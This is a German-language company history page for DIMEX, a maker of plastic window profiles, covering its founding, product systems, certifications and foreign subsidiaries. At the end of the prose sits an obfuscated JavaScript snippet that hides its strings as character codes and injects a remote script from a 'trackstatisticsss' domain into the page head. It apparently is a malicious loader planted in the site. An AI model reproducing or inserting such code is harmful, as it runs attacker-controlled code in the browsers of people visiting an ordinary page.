• +91 99107 60737

Die Erfolgsgeschichte

DIMEX – Fenster zur Zukunft.
Seit der Gründung im Jahr 1933 entwickelt sich das Unternehmen technologisch rasant weiter. In mehreren DIMEX-Unternehmen in verschiedenen Ländern werden hochwertige, individuell auf die jeweiligen Märkte abgestimmte Produkte entwickelt und hergestellt.
 
In Nehren bei Tübingen werden seit 70 Jahren technisch ausgereifte Kunststoffprodukte produziert. Bereits1933 wurde die Verarbeitung duomerer Werkstoffe in einem Kunststoffpresswerk aufgenommen.
 
In den Fünfzigerjahren wurde der Unternehmensbereich „Spritzguss“ aufgenommen. Das Spritzgießen von Thermoplasten war zu dieser Zeit ein wichtiger Schwerpunkt. 1960 wurde mit der Extrusion von Rollladenprofilen und Rohren begonnen. Diese fortschrittliche Fertigungstechnologie hat DIMEX als Pionier wesentlich mitentwickelt.
 
Die siebziger und achtziger Jahre bringen eine völlig neue Dimension. Das Unternehmen spezialisiert sich auf technische Bauelemente, Spritzgussteile und technische Profile. Damit war DIMEX seiner Zeit deutlich voraus. Schon damals hat DIMEX erkannt, worauf es ankommt. Jeder Raum braucht Licht und Sonne – und die kommen durch Fenster herein. Aber durch schlechte Fenster kann auch wertvolle Energie verloren gehen. Diese Herausforderung der Wärmedämmung hat DIMEX sehr ernst genommen und in intelligente technische Lösungen umgewandelt. Die Experten des Unternehmens entwickelten zusammen mit Aluminium- und Fassadenherstellern technisch ausgereifte Wärmedämmprofile für Verbund-Konstruktionen jeglicher Art.
 
Seit 1990 wächst DIMEX kontinuierlich und entwickelt ständig neue, moderne Kunststoff-Fenstersysteme. Durch die Zugehörigkeit zur MDB AG ab 1992 stellt das Unternehmen die Weichen für eine noch erfolgreichere Zukunft.
  
Kontinuierlicher Fortschritt
Der Fortschritt in der Bauindustrie lebt zu einem großen Teil von intelligenten Lösungen in Spezialgebieten. DIMEX setzt auf Erfolg durch Engagement in drei Bereichen: der professionellen Produktion, eine ausgereifte und wirtschaftliche Systemtechnik sowie die Erschließung ausländischer Wachstumsmärkte.
 
Seit August 1994 ist die DIMEX GmbH als eines der ersten Unternehmen der Baubranche in allen Unternehmensbereichen nach DIN EN ISO 9001 zertifiziert,. Die Fensterprofile des DIMEX-Systems haben in vielen europäischen Ländern eine amtliche Zulassung wie z.B. in Polen (ITB), Ungarn (EMI), Tschechien (ITC), Slowakei (VUSPAL) und Deutschland (ift Rosenheim sowie RAL-Prüfung von der Gütegemeinschaft Kunststoff – Fensterprofile). DIMEX stellt Produkte her, die bezüglich ihrer Eigenschaften und des Preises die Anforderungen und Erwartungen der Kunden voll erfüllen. Dies klingt selbstverständlich, erfordert jedoch ein großes Engagement und optimierte, wirtschaftliche Arbeitsabläufe. Alle Prozesse werden systematisch überwacht, die erforderlichen Maßnahmen werden vor und während der Auftragsabwicklung genau geplant und konsequent umgesetzt.
 
Am Beginn der Produktpalette stand ein Kellerfenster – hergestellt mit dem System Super. Es wurde entwickelt, damit aus Keller- und Nebenräumen hochwertiger Wohnraum entstehen kann. Das schlanke Rahmendesign sichert hohen Lichtdurchlass und die technische Ausführung die Funktionalität eines Dreh-Kipp-Fensters. Die Mehrkammertechnik und der Einsatz von Isoliergläsern sorgen für besten Wärmeschutz. Wie kaum ein anderer Anbieter kann DIMEX eine breite Produktpalette dem Markt anbieten. DIMEX hat für jede Fensteröffnung im Haus eine passende Lösung.
 
Bestes Beispiel ist das System CONTOUR 7.0. Mit einer Bautiefe von 70 mm als System mit Mittel- oder Anschlagdichtung wird dieses Profil allen Anforderungen, die an ein Fenster gestellt werden, gerecht. In Verbindung mit einem hochwertigen Wärmeschutzglas erzielt das System einen Uw-Wert von 1,2 W/m2K. Darüber hinaus besticht es durch Eleganz und optische Harmonie. Auch bezüglich den Anforderungen nach schonender Umweltbelastung haben die Entwickler von DIMEX ganze Arbeit geleistet. Die Stabilisatoren sind nicht mehr aus Blei, sondern aus Ca/Zn.
    
Weltweites Engagement
Die Erschließung ausländischer Wachstumsmärkte durch eigene Tochtergesellschaften sowie leistungsfähige Vertretungen ist seit Jahren wichtige Unternehmenspolitik. Die Nähe zum Kunden und die Betreuung durch eine motivierte, qualifizierte Mannschaft vor Ort sind wichtige Grundlagen des Erfolges von DIMEX. Wichtigste Partner im In-und Ausland sind mittelständisch geprägte Unternehmen, die sehr flexibel auf die sich sehr schnell ändernden Markerfordernissen eingehen können.DIMEX ACCORD PROFILE GmbH in Alkoven, Österreich, ist ein bedeutendes und erfolgreiches Unternehmen. Die Gesellschaft gehört seit 2001 zur DIMEX-Gruppe. An diesem Standort werden Systemkomponenten von CONTOUR 7.0 (70 mm Bautiefe) und ELEGANCE (80 mm Bautiefe) hergestellt. Von hier werden die traditionell mit Österreich gut verbundenen osteuropäischen Länder betreut.Die in Tschechien angesiedelte DIMEX profil system s.r.o. stellt hochwertige Fenster für Keller und Nebenräume her. Die Betreuung der Kunden in Tschechien und in der Slowakei erfolgt ebenfalls durch die DIMEX CZ. Eine weitere 100%ige Tochtergesellschaft in Polen, DIMEX Polska Sp. z o.o. ist für die Bearbeitung des polnischen Marktes zuständig.DIMEX ist nicht nur in Europa aktiv, sondern auch in Asien. Die DIMEX (Taicang) Window Profile Co., Ldt. produziert seit 2001 vor den Toren Shanghais speziell für China und den asiatischen Markt entwickelte Fensterprofilsysteme. DIMEX Taicang ist es gelungen, auch bedeutende Kunden in Japan und Korea zu finden. Das Werk besitzt 6 moderne, leistungsfähige Extrusionslinien und eine eigene Mischanlage.Für DIMEX ist die Bearbeitung der Zukunftsmärkte von großer Bedeutung. Deshalb wird derzeit ein Produktionsunternehmen im zwischenzeitlich stärksten Exportland Russland aufgebaut.DIMEX versteht sich als der Spezialist in Sachen Extrusion von Kunststofffensterprofilen. Den Markt mit modernen, dem neuesten technischen Stand entsprechenden Produkten zu beliefern zu angemessenen Preisen und eine enge, vertrauensvolle Zusammenarbeit mit Kunden und allen anderen Partnern hat für alle Unternehmen der DIMEX-Gruppe hohe Bedeutung.
var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}